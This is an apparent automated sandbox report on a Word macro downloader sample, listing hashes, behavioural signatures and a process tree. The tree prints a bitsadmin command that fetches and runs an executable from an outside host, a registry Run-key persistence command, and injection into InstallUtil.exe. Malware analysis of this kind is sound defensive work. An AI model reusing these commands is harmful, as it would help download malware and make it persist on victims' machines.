Analysis
-
max time kernel
151s -
max time network
44s -
platform
windows7_x64 -
resource
win7 -
submitted
01-07-2020 02:06
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.W97M.Downloader.3758.22468.doc
Resource
win7
Behavioral task
behavioral2
Sample
SecuriteInfo.com.W97M.Downloader.3758.22468.doc
Resource
win10v200430
General
-
Target
SecuriteInfo.com.W97M.Downloader.3758.22468.doc
-
Size
39KB
-
MD5
205b4d4b93e744d9ae520b62e98c7619
-
SHA1
688752c9a25d28e3533cc98b37d98bc688614207
-
SHA256
61c7eb8c33d7eb01285c503fa72d249f470fe3606ff10e459cfdc2f9e3d59b35
-
SHA512
40d3d3a4b4b8944ec6546888bd1599945c5b558c7edcc24cdd0dc30f9331b1396d68e34eb5a43f5c38e60b24ad97b67c065722c1b462d4971f5b1e7e7143038c
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
filename.exesystemapp.exepid process 1792 filename.exe 1792 filename.exe 1792 filename.exe 1792 filename.exe 2036 systemapp.exe 2036 systemapp.exe 2036 systemapp.exe -
Loads dropped DLL 2 IoCs
Processes:
filename.exesystemapp.exepid process 1792 filename.exe 2036 systemapp.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
systemapp.exedescription pid process target process PID 2036 set thread context of 620 2036 systemapp.exe InstallUtil.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Suspicious use of WriteProcessMemory 43 IoCs
Processes:
WINWORD.EXEfilename.execmd.exesystemapp.execmd.exedescription pid process target process PID 1060 wrote to memory of 1432 1060 WINWORD.EXE bitsadmin.exe PID 1060 wrote to memory of 1432 1060 WINWORD.EXE bitsadmin.exe PID 1060 wrote to memory of 1432 1060 WINWORD.EXE bitsadmin.exe PID 1060 wrote to memory of 1792 1060 WINWORD.EXE filename.exe PID 1060 wrote to memory of 1792 1060 WINWORD.EXE filename.exe PID 1060 wrote to memory of 1792 1060 WINWORD.EXE filename.exe PID 1060 wrote to memory of 1792 1060 WINWORD.EXE filename.exe PID 1792 wrote to memory of 1652 1792 filename.exe WINWORD.EXE PID 1792 wrote to memory of 1652 1792 filename.exe WINWORD.EXE PID 1792 wrote to memory of 1652 1792 filename.exe WINWORD.EXE PID 1792 wrote to memory of 1652 1792 filename.exe WINWORD.EXE PID 1792 wrote to memory of 1576 1792 filename.exe cmd.exe PID 1792 wrote to memory of 1576 1792 filename.exe cmd.exe PID 1792 wrote to memory of 1576 1792 filename.exe cmd.exe PID 1792 wrote to memory of 1576 1792 filename.exe cmd.exe PID 1576 wrote to memory of 1860 1576 cmd.exe reg.exe PID 1576 wrote to memory of 1860 1576 cmd.exe reg.exe PID 1576 wrote to memory of 1860 1576 cmd.exe reg.exe PID 1576 wrote to memory of 1860 1576 cmd.exe reg.exe PID 1792 wrote to memory of 2036 1792 filename.exe systemapp.exe PID 1792 wrote to memory of 2036 1792 filename.exe systemapp.exe PID 1792 wrote to memory of 2036 1792 filename.exe systemapp.exe PID 1792 wrote to memory of 2036 1792 filename.exe systemapp.exe PID 2036 wrote to memory of 520 2036 systemapp.exe cmd.exe PID 2036 wrote to memory of 520 2036 systemapp.exe cmd.exe PID 2036 wrote to memory of 520 2036 systemapp.exe cmd.exe PID 2036 wrote to memory of 520 2036 systemapp.exe cmd.exe PID 520 wrote to memory of 576 520 cmd.exe reg.exe PID 520 wrote to memory of 576 520 cmd.exe reg.exe PID 520 wrote to memory of 576 520 cmd.exe reg.exe PID 520 wrote to memory of 576 520 cmd.exe reg.exe PID 2036 wrote to memory of 620 2036 systemapp.exe InstallUtil.exe PID 2036 wrote to memory of 620 2036 systemapp.exe InstallUtil.exe PID 2036 wrote to memory of 620 2036 systemapp.exe InstallUtil.exe PID 2036 wrote to memory of 620 2036 systemapp.exe InstallUtil.exe PID 2036 wrote to memory of 620 2036 systemapp.exe InstallUtil.exe PID 2036 wrote to memory of 620 2036 systemapp.exe InstallUtil.exe PID 2036 wrote to memory of 620 2036 systemapp.exe InstallUtil.exe PID 2036 wrote to memory of 620 2036 systemapp.exe InstallUtil.exe PID 2036 wrote to memory of 620 2036 systemapp.exe InstallUtil.exe PID 2036 wrote to memory of 620 2036 systemapp.exe InstallUtil.exe PID 2036 wrote to memory of 620 2036 systemapp.exe InstallUtil.exe PID 2036 wrote to memory of 620 2036 systemapp.exe InstallUtil.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
filename.exesystemapp.exedescription pid process Token: SeDebugPrivilege 1792 filename.exe Token: SeDebugPrivilege 2036 systemapp.exe -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
bitsadmin.exefilename.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1432 1060 bitsadmin.exe WINWORD.EXE Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1792 1060 filename.exe WINWORD.EXE -
Executes dropped EXE 2 IoCs
Processes:
systemapp.exeInstallUtil.exepid process 2036 systemapp.exe 620 InstallUtil.exe -
Drops file in System32 directory 5 IoCs
Processes:
filename.exeWINWORD.EXEsystemapp.exedescription ioc process File created C:\Windows\SysWOW64\APPFORM FORM.docx filename.exe File opened for modification C:\Windows\system32\APPFORM FORM.docx WINWORD.EXE File opened for modification C:\Windows\SysWOW64\systemapp.exe filename.exe File created C:\Windows\SysWOW64\systemapp.exe filename.exe File opened for modification C:\Windows\SysWOW64\APPFORM FORM.docx systemapp.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1060 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXEpid process 1060 WINWORD.EXE 1060 WINWORD.EXE 1060 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.W97M.Downloader.3758.22468.doc"1⤵
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer myFile /download /priority normal http://entrega-vertices.com/10G1B.exe C:\Users\Admin\AppData\Local\Temp\filename.exe2⤵
- Download via BitsAdmin
- Process spawned unexpected child process
-
C:\Users\Admin\AppData\Local\Temp\filename.exeC:\Users\Admin\AppData\Local\Temp\filename.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Process spawned unexpected child process
- Drops file in System32 directory
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Windows\system32\APPFORM FORM.docx"3⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v system application /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Windows\system32\systemapp.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v system application /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Windows\system32\systemapp.exe"4⤵
-
C:\Windows\SysWOW64\systemapp.exe"C:\Windows\system32\systemapp.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v system application /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Windows\system32\systemapp.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v system application /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Windows\system32\systemapp.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"4⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
-
C:\Users\Admin\Documents\APPFORM FORM.txt
-
C:\Windows\SysWOW64\APPFORM FORM.docx
-
C:\Windows\SysWOW64\systemapp.exe
-
C:\Windows\SysWOW64\systemapp.exe
-
\Users\Admin\AppData\Local\Temp\InstallUtil.exe
-
\Windows\SysWOW64\systemapp.exe
-
memory/520-24-0x0000000000000000-mapping.dmp
-
memory/576-25-0x0000000000000000-mapping.dmp
-
memory/620-29-0x000000000040CA6E-mapping.dmp
-
memory/620-28-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/1060-8-0x0000000008CE0000-0x0000000008CE4000-memory.dmpFilesize
16KB
-
memory/1060-10-0x0000000008CE0000-0x0000000008CE4000-memory.dmpFilesize
16KB
-
memory/1060-9-0x0000000008CE0000-0x0000000008CE4000-memory.dmpFilesize
16KB
-
memory/1432-2-0x0000000000000000-mapping.dmp
-
memory/1576-11-0x0000000000000000-mapping.dmp
-
memory/1652-7-0x0000000000000000-mapping.dmp
-
memory/1792-5-0x0000000000000000-0x0000000000000000-disk.dmp
-
memory/1792-3-0x0000000000000000-mapping.dmp
-
memory/1860-12-0x0000000000000000-mapping.dmp
-
memory/2036-16-0x0000000000000000-mapping.dmp